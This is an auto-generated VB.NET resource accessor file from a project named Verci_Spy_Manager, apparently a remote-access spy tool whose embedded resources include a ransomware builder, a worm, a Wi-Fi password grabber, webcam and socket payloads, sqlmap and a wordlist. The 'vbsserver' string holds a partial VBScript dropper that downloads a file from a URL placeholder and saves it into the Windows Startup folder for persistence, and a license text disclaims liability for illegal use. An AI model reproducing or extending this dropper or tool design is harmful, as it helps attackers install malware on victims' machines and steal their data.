'------------------------------------------------------------------------------
' <auto-generated>
'     This code was generated by a tool.
'     Runtime Version:4.0.30319.34209
'
'     Changes to this file may cause incorrect behavior and will be lost if
'     the code is regenerated.
' </auto-generated>
'------------------------------------------------------------------------------

Option Strict On
Option Explicit On

Imports System

Namespace My.Resources
    
    'This class was auto-generated by the StronglyTypedResourceBuilder
    'class via a tool like ResGen or Visual Studio.
    'To add or remove a member, edit your .ResX file then rerun ResGen
    'with the /str option, or rebuild your VS project.
    '''<summary>
    '''  A strongly-typed resource class, for looking up localized strings, etc.
    '''</summary>
    <Global.System.CodeDom.Compiler.GeneratedCodeAttribute("System.Resources.Tools.StronglyTypedResourceBuilder", "4.0.0.0"),  _
     Global.System.Diagnostics.DebuggerNonUserCodeAttribute(),  _
     Global.System.Runtime.CompilerServices.CompilerGeneratedAttribute(),  _
     Global.Microsoft.VisualBasic.HideModuleNameAttribute()>  _
    Friend Module Resources
        
        Private resourceMan As Global.System.Resources.ResourceManager
        
        Private resourceCulture As Global.System.Globalization.CultureInfo
        
        '''<summary>
        '''  Returns the cached ResourceManager instance used by this class.
        '''</summary>
        <Global.System.ComponentModel.EditorBrowsableAttribute(Global.System.ComponentModel.EditorBrowsableState.Advanced)>  _
        Friend ReadOnly Property ResourceManager() As Global.System.Resources.ResourceManager
            Get
                If Object.ReferenceEquals(resourceMan, Nothing) Then
                    Dim temp As Global.System.Resources.ResourceManager = New Global.System.Resources.ResourceManager("Verci_Spy_Manager.Resources", GetType(Resources).Assembly)
                    resourceMan = temp
                End If
                Return resourceMan
            End Get
        End Property
        
        '''<summary>
        '''  Overrides the current thread's CurrentUICulture property for all
        '''  resource lookups using this strongly typed resource class.
        '''</summary>
        <Global.System.ComponentModel.EditorBrowsableAttribute(Global.System.ComponentModel.EditorBrowsableState.Advanced)>  _
        Friend Property Culture() As Global.System.Globalization.CultureInfo
            Get
                Return resourceCulture
            End Get
            Set
                resourceCulture = value
            End Set
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Byte[].
        '''</summary>
        Friend ReadOnly Property _1() As Byte()
            Get
                Dim obj As Object = ResourceManager.GetObject("_1", resourceCulture)
                Return CType(obj,Byte())
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Drawing.Icon similar to (Icon).
        '''</summary>
        Friend ReadOnly Property _1484113848_advancedsettings() As System.Drawing.Icon
            Get
                Dim obj As Object = ResourceManager.GetObject("_1484113848_advancedsettings", resourceCulture)
                Return CType(obj,System.Drawing.Icon)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Byte[].
        '''</summary>
        Friend ReadOnly Property _2() As Byte()
            Get
                Dim obj As Object = ResourceManager.GetObject("_2", resourceCulture)
                Return CType(obj,Byte())
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Byte[].
        '''</summary>
        Friend ReadOnly Property cam() As Byte()
            Get
                Dim obj As Object = ResourceManager.GetObject("cam", resourceCulture)
                Return CType(obj,Byte())
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Byte[].
        '''</summary>
        Friend ReadOnly Property CamUpdate() As Byte()
            Get
                Dim obj As Object = ResourceManager.GetObject("CamUpdate", resourceCulture)
                Return CType(obj,Byte())
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Drawing.Bitmap.
        '''</summary>
        Friend ReadOnly Property Container() As System.Drawing.Bitmap
            Get
                Dim obj As Object = ResourceManager.GetObject("Container", resourceCulture)
                Return CType(obj,System.Drawing.Bitmap)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Drawing.Bitmap.
        '''</summary>
        Friend ReadOnly Property ControlBox() As System.Drawing.Bitmap
            Get
                Dim obj As Object = ResourceManager.GetObject("ControlBox", resourceCulture)
                Return CType(obj,System.Drawing.Bitmap)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to 
        '''
        '''Afghanistan|33.00,65.00
        '''
        '''Akrotiri|34.37,32.58
        '''
        '''Albania|41.00,20.00
        '''
        '''Algeria|28.00,3.00
        '''
        '''American Samoa|-14.20,-170.00
        '''
        '''Andorra|42.30,1.30
        '''
        '''Angola|-12.30,18.30
        '''
        '''Anguilla|18.15,-63.10
        '''
        '''Antarctica|-90.00,0.00
        '''
        '''Antigua and Barbuda|17.03,-61.48
        '''
        '''Arctic Ocean|90.00,0.00
        '''
        '''Argentina|-34.00,-64.00
        '''
        '''Armenia|40.00,45.00
        '''
        '''Aruba|12.30,-69.58
        '''
        '''Ashmore and Cartier Islands|-12.14,123.05
        '''
        '''Atlantic Ocean|0.00,-25.00
        '''
        '''Australia|-27.00,133.00
        '''
        '''Austria|47.20,13.20
        '''
        '''Azerbaijan|40.30,47.30        ''' [rest of string was truncated]&quot;;.
        '''</summary>
        Friend ReadOnly Property countryinfo() As String
            Get
                Return ResourceManager.GetString("countryinfo", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Byte[].
        '''</summary>
        Friend ReadOnly Property fb() As Byte()
            Get
                Dim obj As Object = ResourceManager.GetObject("fb", resourceCulture)
                Return CType(obj,Byte())
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Drawing.Bitmap.
        '''</summary>
        Friend ReadOnly Property Fx() As System.Drawing.Bitmap
            Get
                Dim obj As Object = ResourceManager.GetObject("Fx", resourceCulture)
                Return CType(obj,System.Drawing.Bitmap)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Drawing.Bitmap.
        '''</summary>
        Friend ReadOnly Property Icon_2() As System.Drawing.Bitmap
            Get
                Dim obj As Object = ResourceManager.GetObject("Icon_2", resourceCulture)
                Return CType(obj,System.Drawing.Bitmap)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Drawing.Bitmap.
        '''</summary>
        Friend ReadOnly Property Icon_4() As System.Drawing.Bitmap
            Get
                Dim obj As Object = ResourceManager.GetObject("Icon_4", resourceCulture)
                Return CType(obj,System.Drawing.Bitmap)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Drawing.Icon similar to (Icon).
        '''</summary>
        Friend ReadOnly Property Icons_Land_Vista_Hardware_Devices_Home_Server() As System.Drawing.Icon
            Get
                Dim obj As Object = ResourceManager.GetObject("Icons_Land_Vista_Hardware_Devices_Home_Server", resourceCulture)
                Return CType(obj,System.Drawing.Icon)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Drawing.Bitmap.
        '''</summary>
        Friend ReadOnly Property imageviewer2() As System.Drawing.Bitmap
            Get
                Dim obj As Object = ResourceManager.GetObject("imageviewer2", resourceCulture)
                Return CType(obj,System.Drawing.Bitmap)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Drawing.Bitmap.
        '''</summary>
        Friend ReadOnly Property imge_3() As System.Drawing.Bitmap
            Get
                Dim obj As Object = ResourceManager.GetObject("imge_3", resourceCulture)
                Return CType(obj,System.Drawing.Bitmap)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Drawing.Bitmap.
        '''</summary>
        Friend ReadOnly Property OD() As System.Drawing.Bitmap
            Get
                Dim obj As Object = ResourceManager.GetObject("OD", resourceCulture)
                Return CType(obj,System.Drawing.Bitmap)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Drawing.Bitmap.
        '''</summary>
        Friend ReadOnly Property panel() As System.Drawing.Bitmap
            Get
                Dim obj As Object = ResourceManager.GetObject("panel", resourceCulture)
                Return CType(obj,System.Drawing.Bitmap)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Byte[].
        '''</summary>
        Friend ReadOnly Property pay() As Byte()
            Get
                Dim obj As Object = ResourceManager.GetObject("pay", resourceCulture)
                Return CType(obj,Byte())
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Byte[].
        '''</summary>
        Friend ReadOnly Property ProcessSocket() As Byte()
            Get
                Dim obj As Object = ResourceManager.GetObject("ProcessSocket", resourceCulture)
                Return CType(obj,Byte())
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Drawing.Icon similar to (Icon).
        '''</summary>
        Friend ReadOnly Property Raindropmemory_Server_Server_carbon() As System.Drawing.Icon
            Get
                Dim obj As Object = ResourceManager.GetObject("Raindropmemory_Server_Server_carbon", resourceCulture)
                Return CType(obj,System.Drawing.Icon)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Byte[].
        '''</summary>
        Friend ReadOnly Property RAR() As Byte()
            Get
                Dim obj As Object = ResourceManager.GetObject("RAR", resourceCulture)
                Return CType(obj,Byte())
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Drawing.Bitmap.
        '''</summary>
        Friend ReadOnly Property S1() As System.Drawing.Bitmap
            Get
                Dim obj As Object = ResourceManager.GetObject("S1", resourceCulture)
                Return CType(obj,System.Drawing.Bitmap)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Drawing.Bitmap.
        '''</summary>
        Friend ReadOnly Property S2() As System.Drawing.Bitmap
            Get
                Dim obj As Object = ResourceManager.GetObject("S2", resourceCulture)
                Return CType(obj,System.Drawing.Bitmap)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Byte[].
        '''</summary>
        Friend ReadOnly Property SaherBlueEagleRansomwareBuilder() As Byte()
            Get
                Dim obj As Object = ResourceManager.GetObject("SaherBlueEagleRansomwareBuilder", resourceCulture)
                Return CType(obj,Byte())
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Drawing.Icon similar to (Icon).
        '''</summary>
        Friend ReadOnly Property Saki_NuoveXT_2_Places_server_network() As System.Drawing.Icon
            Get
                Dim obj As Object = ResourceManager.GetObject("Saki_NuoveXT_2_Places_server_network", resourceCulture)
                Return CType(obj,System.Drawing.Icon)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Byte[].
        '''</summary>
        Friend ReadOnly Property Server_New_() As Byte()
            Get
                Dim obj As Object = ResourceManager.GetObject("Server_New_", resourceCulture)
                Return CType(obj,Byte())
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Byte[].
        '''</summary>
        Friend ReadOnly Property SpyByte_Pal_Worm_() As Byte()
            Get
                Dim obj As Object = ResourceManager.GetObject("SpyByte_Pal_Worm_", resourceCulture)
                Return CType(obj,Byte())
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Byte[].
        '''</summary>
        Friend ReadOnly Property sqlmap() As Byte()
            Get
                Dim obj As Object = ResourceManager.GetObject("sqlmap", resourceCulture)
                Return CType(obj,Byte())
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Byte[].
        '''</summary>
        Friend ReadOnly Property txhost() As Byte()
            Get
                Dim obj As Object = ResourceManager.GetObject("txhost", resourceCulture)
                Return CType(obj,Byte())
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Byte[].
        '''</summary>
        Friend ReadOnly Property UnRAR() As Byte()
            Get
                Dim obj As Object = ResourceManager.GetObject("UnRAR", resourceCulture)
                Return CType(obj,Byte())
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to fileurl =%url%
        '''filename =%name%
        '''dim shellobj 
        '''set shellobj = wscript.createobject(&quot;wscript.shell&quot;)
        '''strlink = fileurl
        '''strPath = shellobj.SpecialFolders(&quot;Startup&quot;)  
        '''strPath = strPath  &amp; &quot;\Startup&quot;
        '''strsaveto = strPath &amp; filename
        '''set objhttpdownload = createobject(&quot;msxml2.xmlhttp&quot; )
        '''objhttpdownload.open &quot;get&quot;, strlink, false
        '''objhttpdownload.send
        '''set objfsodownload = createobject (&quot;scripting.filesystemobject&quot;)
        '''if  objfsodownload.fileexists (strsaveto) then
        '''    objfsodownload.deletefile (strsaveto)        ''' [rest of string was truncated]&quot;;.
        '''</summary>
        Friend ReadOnly Property vbsserver() As String
            Get
                Return ResourceManager.GetString("vbsserver", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to Welcome To Verci_Spy_System 
        '''
        '''=&gt; License Agreement Approval :
        '''* Illegal use of this software may lead you to prison.
        '''*The Programmer is not responsible for any Illegal Use of this Software .
        '''
        '''
        '''=&gt; By accepting this Agreement :
        '''1- You are responsible for any illegal use.
        '''2- You are responsible for any damage will occur.
        '''3- You are responsible for testing ransomwares on your PC.
        ''' 
        '''
        '''=&gt; End to End Encryption ( Fully Encrypted Socket)
        '''* Data transfered cannot be Monitored (Secure)
        '''
        '''=&gt; Program Opti [rest of string was truncated]&quot;;.
        '''</summary>
        Friend ReadOnly Property verciD() As String
            Get
                Return ResourceManager.GetString("verciD", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Byte[].
        '''</summary>
        Friend ReadOnly Property visa() As Byte()
            Get
                Dim obj As Object = ResourceManager.GetObject("visa", resourceCulture)
                Return CType(obj,Byte())
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Byte[].
        '''</summary>
        Friend ReadOnly Property WifiGrabber() As Byte()
            Get
                Dim obj As Object = ResourceManager.GetObject("WifiGrabber", resourceCulture)
                Return CType(obj,Byte())
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Byte[].
        '''</summary>
        Friend ReadOnly Property wordlist() As Byte()
            Get
                Dim obj As Object = ResourceManager.GetObject("wordlist", resourceCulture)
                Return CType(obj,Byte())
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Drawing.Icon similar to (Icon).
        '''</summary>
        Friend ReadOnly Property wscript_1() As System.Drawing.Icon
            Get
                Dim obj As Object = ResourceManager.GetObject("wscript_1", resourceCulture)
                Return CType(obj,System.Drawing.Icon)
            End Get
        End Property
    End Module
End Namespace
